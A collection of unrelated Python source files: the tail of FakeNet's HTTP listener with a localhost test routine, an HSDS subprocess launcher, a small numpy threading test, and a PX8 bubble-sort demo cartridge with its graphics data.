response_filename = os.path.join(self.server.webroot_path, MIME_FILE_RESPONSE.get(response_type, 'FakeNet.html'))
# Check default MIME file exists
if not os.path.exists(response_filename):
self.server.logger.debug('Could not find path: %s', response_filename)
self.server.logger.error('Could not locate requested file or default handler.')
return (response, response_type)
self.server.logger.info('Responding with mime type: %s file: %s', response_type, response_filename)
try:
f = open(response_filename, 'rb')
except Exception, e:
self.server.logger.error('Failed to open response file: %s', response_filename)
response_type = 'text/html'
else:
response = f.read()
f.close()
return (response, response_type)
def log_message(self, format, *args):
return
###############################################################################
# Testing code
def test(config):
import requests
url = "%s://localhost:%s" % ('http' if config.get('usessl') == 'No' else 'https', int(config.get('port', 8080)))
print "\t[HTTPListener] Testing HEAD request."
print '-'*80
print requests.head(url, verify=False, stream=True).text
print '-'*80
print "\t[HTTPListener] Testing GET request."
print '-'*80
print requests.get(url, verify=False, stream=True).text
print '-'*80
print "\t[HTTPListener] Testing POST request."
print '-'*80
print requests.post(url, {'param1':'A'*80, 'param2':'B'*80}, verify=False, stream=True).text
print '-'*80
def main():
logging.basicConfig(format='%(asctime)s [%(name)15s] %(message)s', datefmt='%m/%d/%y %I:%M:%S %p', level=logging.DEBUG)
config = {'port': '8443', 'usessl': 'Yes', 'webroot': '../defaultFiles' }
listener = HTTPListener(config)
listener.start()
###########################################################################
# Run processing
import time
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
pass
###########################################################################
# Run tests
test(config)
if __name__ == '__main__':
main() |
hsds_app.py | import os
import sys
from pathlib import Path
import site
import signal
import subprocess
import time
import uuid
import queue
import threading
import logging
from shutil import which
# maximum number of characters if socket directory is given
# Exceeding this can cause errors - see: https://github.com/HDFGroup/hsds/issues/129
MAX_SOCKET_DIR_PATH_LEN=64
def _enqueue_output(out, queue, loglevel):
for line in iter(out.readline, b''):
# filter lines by loglevel
words = line.split()
put_line = True
if loglevel != logging.DEBUG:
if len(words) >= 2:
# format should be "node_name log_level> msg"
level = words[1][:-1]
if loglevel == logging.INFO:
if level == "DEBUG":
put_line = False
elif loglevel == logging.WARN or loglevel == logging.WARNING:
if not level.startswith("WARN") and level != "ERROR":
put_line = False
elif loglevel == logging.ERROR:
if level != "ERROR":
put_line = False
put_line = True
if put_line:
queue.put(line)
logging.debug("enqueu_output close()")
out.close()
def get_cmd_dir():
"""Return directory where hsds console shortcuts are."""
hsds_shortcut = "hsds-servicenode"
user_bin_dir = os.path.join(site.getuserbase(), "bin")
if os.path.isdir(user_bin_dir):
logging.debug(f"userbase bin_dir: {user_bin_dir}")
if os.path.isfile(os.path.join(user_bin_dir, hsds_shortcut)):
logging.info(f"using cmd_dir: {user_bin_dir}")
return user_bin_dir
logging.debug(f"looking for {hsds_shortcut} in PATH env var folders")
cmd = which(hsds_shortcut, mode=os.F_OK | os.R_OK)
if cmd is not None:
cmd_dir = os.path.dirname(cmd)
logging.info(f"using cmd_dir: {cmd_dir}")
return cmd_dir
sys_bin_dir = os.path.join(sys.exec_prefix, "bin")
if os.path.isdir(sys_bin_dir):
logging.debug(f"sys bin_dir: {sys_bin_dir}")
if os.path.isfile(os.path.join(sys_bin_dir, hsds_shortcut)):
logging.info(f"using cmd_dir: {sys_bin_dir}")
return sys_bin_dir
# fall back to just use __file__.parent
bin_dir = Path(__file__).parent
logging.info(f"no userbase or syspath found - using: {bin_dir}")
return bin_dir
class HsdsApp:
"""
Class to initiate and manage sub-process HSDS service
"""
def __init__(self, username=None,
password=None, password_file=None, logger=None,
log_level=None, dn_count=1, logfile=None,
socket_dir=None, config_dir=None, readonly=False,
islambda=False):
"""
Initializer for class
"""
"""
# Using tempdir is causing a unicode exception
# See: https://bugs.python.org/issue32958
self._tempdir = tempfile.TemporaryDirectory()
tmp_dir = self._tempdir.name
"""
# create a random dirname if one is not supplied
if socket_dir:
if len(socket_dir) > MAX_SOCKET_DIR_PATH_LEN:
raise ValueError(f"length of socket_dir must be less than: {MAX_SOCKET_DIR_PATH_LEN}")
if socket_dir[-1] != '/':
socket_dir += '/'
else:
tmp_dir = "/tmp" # TBD: will this work on windows?
rand_name = uuid.uuid4().hex[:8]
socket_dir = f"{tmp_dir}/hs{rand_name}/" # TBD: use temp dir
self._dn_urls = []
self._socket_paths = []
self._processes = []
self._queues = []
self._threads = []
self._dn_count = dn_count
self._username = username
self._password = password
self._password_file = password_file
self._logfile = logfile
self._loglevel = log_level
self._readonly = readonly
self._islambda = islambda
self._ready = False
self._config_dir = config_dir
self._cmd_dir = get_cmd_dir()
if logger is None:
self.log = logging
else:
self.log = logger
if not os.path.isdir(socket_dir):
os.mkdir(socket_dir)
self.log.debug(f"HsdsApp init - Using socketdir: {socket_dir}")
# url-encode any slashed in the socket dir
socket_url = ""
for ch in socket_dir:
if ch == '/':
socket_url += "%2F"
else:
socket_url += ch
for i in range(dn_count):
socket_name = f"dn_{(i+1)}.sock"
dn_url = f"http+unix://{socket_url}{socket_name}"
self._dn_urls.append(dn_url)
self._socket_paths.append(f"{socket_dir}{socket_name}")
# sort the ports so that node_number can be determined based on dn_url
self._dn_urls.sort()
self._endpoint = f"http+unix://{socket_url}sn_1.sock"
self._socket_paths.append(f"{socket_dir}sn_1.sock")
self._rangeget_url = f"http+unix://{socket_url}rangeget.sock"
self._socket_paths.append(f"{socket_dir}rangeget.sock")
@property
def endpoint(self):
return self._endpoint
@property
def ready(self):
return self._ready
def print_process_output(self):
""" print any queue output from sub-processes
"""
if self._logfile:
f = open(self._logfile, "a")
else:
f = sys.stdout
while True:
got_output = False
for q in self._queues:
try:
line = q.get_nowait() # or q.get(timeout=.1)
except queue.Empty:
pass # no output on this queue yet
else:
if isinstance(line, bytes):
# self.log.debug(line.decode("utf-8").strip())
f.write(line.decode("utf-8"))
else:
f.write(line)
got_output = True
if not got_output:
break # all queues empty for now
if self._logfile:
f.close()
def check_processes(self):
# self.log.debug("check processes")
self.print_process_output()
for p in self._processes:
if p.poll() is not None:
result = p.communicate()
msg = f"process {p.args[0]} ended, result: {result}"
self.log.warn(msg)
# TBD - restart failed process
def run(self):
""" startup hsds processes
"""
if self._processes:
# just check process state and restart if necessary
self.check_processes()
return
dn_urls_arg = ""
for dn_url in self._dn_urls:
if dn_urls_arg:
dn_urls_arg += ','
dn_urls_arg += dn_url
pout = subprocess.PIPE # will pipe to parent
# create processes for count dn nodes, sn node, and rangeget node
count = self._dn_count + 2 # plus 2 for rangeget proxy and sn
# set PYTHONUNBUFFERED so we can get any output immediately
os.environ["PYTHONUNBUFFERED"] = "1"
# TODO: don't modify parent process env, use os.environ.copy(), set, and popen(env=)
common_args = ["--standalone", ]
common_args.append(f"--dn_urls={dn_urls_arg}")
common_args.append(f"--rangeget_url={self._rangeget_url}")
common_args.append(f"--hsds_endpoint={self._endpoint}")
if self._islambda:
# base boto packages installed in AWS image conflicting with aiobotocore
# see: https://github.com/aio-libs/aiobotocore/issues/862
# This command line argument will tell the sub-processes to remove
# sitepackage libs from their path before importing aiobotocore
common_args.append("--removesitepackages")
# common_args.append("--server_name=Direct Connect (HSDS)")
common_args.append("--use_socket")
if self._readonly:
common_args.append("--readonly")
if self._config_dir:
common_args.append(f"--config-dir={self._config_dir}")
if self._loglevel:
common_args.append(f"--log_level={self._loglevel}")
py_exe = sys.executable
cmd_dir = os.path.join(sys.exec_prefix, "bin")
for i in range(count):
if i == 0:
# args for service node
pargs = [py_exe,
os.path.join(cmd_dir, "hsds-node"),
"--node_type=sn",
"--log_prefix=sn "]
if self._username:
pargs.append(f"--hs_username={self._username}")
if self._password:
pargs.append(f"--hs_password={self._password}")
if self._password_file:
pargs.append(f"--password_file={self._password_file}")
else:
pargs.append("--password_file=")
pargs.append(f"--sn_url={self._endpoint}")
pargs.append("--logfile=sn1.log")
elif i == 1:
# args for rangeget node
pargs = [py_exe,
os.path.join(cmd_dir, "hsds-node"),
"--node_type=rn",
"--log_prefix=rg "]
else:
node_number = i - 2 # start with 0
pargs = [py_exe,
os.path.join(cmd_dir, "hsds-node"),
"--node_type=dn",
f"--log_prefix=dn{node_number+1} "]
pargs.append(f"--dn_urls={dn_urls_arg}")
pargs.append(f"--node_number={node_number}")
# logging.info(f"starting {pargs[0]}")
pargs.extend(common_args)
p = subprocess.Popen(pargs, bufsize=1, universal_newlines=True,
shell=False, stdout=pout)
self._processes.append(p)
# setup queue so we can check on process output without blocking
q = queue.Queue()
loglevel = self.log.root.level
t = threading.Thread(
target=_enqueue_output, args=(p.stdout, q, loglevel))
self._queues.append(q)
t.daemon = True # thread dies with the program
t.start()
self._threads.append(t)
# wait to sockets are initialized
start_ts = time.time()
SLEEP_TIME = 0.1 # time to sleep between checking on socket connection
MAX_INIT_TIME = 10.0 # max time to wait for socket to be initialized
while True:
ready = 0
for socket_path in self._socket_paths:
if os.path.exists(socket_path):
ready += 1
if ready == count:
self.log.info("all processes ready!")
break
else:
self.log.debug(f"{ready}/{count} ready")
self.log.debug(f"sleeping for {SLEEP_TIME}")
time.sleep(SLEEP_TIME)
if time.time() > start_ts + MAX_INIT_TIME:
msg = f"failed to initialize after {MAX_INIT_TIME} seconds"
self.log.error(msg)
raise IOError(msg)
self.log.info(f"Ready after: {(time.time()-start_ts):4.2f} s")
self._ready = True
def stop(self):
""" terminate hsds processes
"""
if not self._processes:
return
now = time.time()
logging.info(f"hsds app stop at {now}")
for p in self._processes:
logging.info(f"sending SIGINT to {p.args[0]}")
p.send_signal(signal.SIGINT)
# wait for sub-proccesses to exit
SLEEP_TIME = 0.1 # time to sleep between checking on process state
MAX_WAIT_TIME = 10.0 # max time to wait for sub-process to terminate
start_ts = time.time()
while True:
is_alive = False
for p in self._processes:
if p.poll() is None:
is_alive = True
if is_alive:
logging.debug(f"still alive, sleep {SLEEP_TIME}")
time.sleep(SLEEP_TIME)
else:
logging.debug("all subprocesses exited")
break
if time.time() > start_ts + MAX_WAIT_TIME:
msg = f"failed to terminate after {MAX_WAIT_TIME} seconds"
self.log.error(msg)
break
# kill any reluctant to die processes
for p in self._processes:
if p.poll():
logging.info(f"terminating {p.args[0]}")
p.terminate()
self._processes = []
for t in self._threads:
del t
self._threads = []
def __del__(self):
""" cleanup class resources """
self.stop()
# self._tempdir.cleanup()
|
threaded_aftermain.py | from time import sleep
import threading
import numpy
def thread1():
# Main allocation after main thread exits:
sleep(0.5)
data = numpy.ones((1024, 1024, 70), dtype=numpy.uint8)
sleep(0.5)
threading.Thread(target=thread1).start()
def main():
sleep(0.1)
main()
|
px8_sort.py | px8 / python cartridge
version 1
__python__
# Educational examples to understand some algorithms
import random
import threading
import time
class Button(object):
def __init__(self, x, y, w, h, color, text):
self.x1 = x
self.y1 = y
self.x2 = x+w
self.y2 = y+h
self.color = color
self.text = text
self.clicked = False
def draw(self):
rectfill(self.x1, self.y1, self.x2, self.y2, self.color)
px8_print(self.text, self.x1+1, self.y1+1, 2)
def update(self, x, y):
self.clicked = False
if x >= self.x1 and x <= self.x2:
if y >= self.y1 and y <= self.y2:
self.clicked = True
def is_click(self):
return self.clicked
def random_color():
return random.randint(1, 16)
class BubbleSort(object):
def __init__(self):
self.T = 0
self.alist = [(int(110*random.random()), i) for i in range(1, 16)]
t1 = threading.Thread(target=self.start_algorithm)
t1.start()
def init(self):
cls()
self.draw_list()
def update(self):
self.T += 1
def start_algorithm(self):
for passnum in range(len(self.alist)-1,0,-1):
for i in range(passnum):
if self.alist[i][0]>self.alist[i+1][0]:
temp = self.alist[i]
self.alist[i] = self.alist[i+1]
self.alist[i+1] = temp
time.sleep(0.2)
def draw_list(self):
idx = 4
for i in self.alist:
rect(idx, i[0], idx+8, 110, 0)
rectfill(idx+1, i[0], idx+7, 110, i[1])
idx += 8
def draw(self):
cls()
self.draw_list()
idx_demo = 0
demos = [
["BubbleSort", [BubbleSort()]],
]
buttons = []
buttons.append(Button(70, 118, 16, 8, 9, "run"))
buttons.append(Button(88, 118, 16, 8, 9, "next"))
def _init():
global demos, idx_demo
cls()
for demo in demos[idx_demo][1]:
demo.init()
def prev_demo():
global idx_demo, demos
idx_demo = (idx_demo-1) % len(demos)
pal()
for demo in demos[idx_demo][1]:
demo.init()
def next_demo():
global idx_demo, demos
idx_demo = (idx_demo+1) % len(demos)
pal()
for demo in demos[idx_demo][1]:
demo.init()
def _update():
global idx_demo, demos, buttons
_mouse_state = mouse_state()
if _mouse_state == 1:
_mouse_x = mouse_x()
_mouse_y = mouse_y()
for button in buttons:
button.update(_mouse_x, _mouse_y)
if button.is_click():
next_demo()
for demo in demos[idx_demo][1]:
demo.update()
def _draw():
global idx_demo, demos, buttons
for demo in demos[idx_demo][1]:
demo.draw()
for button in buttons:
button.draw()
px8_print("Demos " + demos[idx_demo][0], 0, 120, 2)
__gfx__
10000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000088088000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000888887800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000888888800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000088888000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000008880000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000077007700777777007700000077000000777777000000000770007700777777007777770077000000777700000000000000000000000000000000000
00000000077007700770000007700000077000000770077000000000770007700770077007700770077000000770077000000000000000000000000000000000
00000000077007700770000007700000077000000770077000000000770707700770077007700770077000000770077000000000000000000000000000000000
00000000077777700777700007700000077000000770077000000000777777700770077007777000077000000770077000000000000000000000000000000000
00000000077007700770000007700000077000000770077000000000777077700770077007700770077000000770077000000000000000000000000000000000
00000000077007700777777007777770077777700777777000000000770007700777777007700770077777700777777000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
__gff__
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
__map__
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
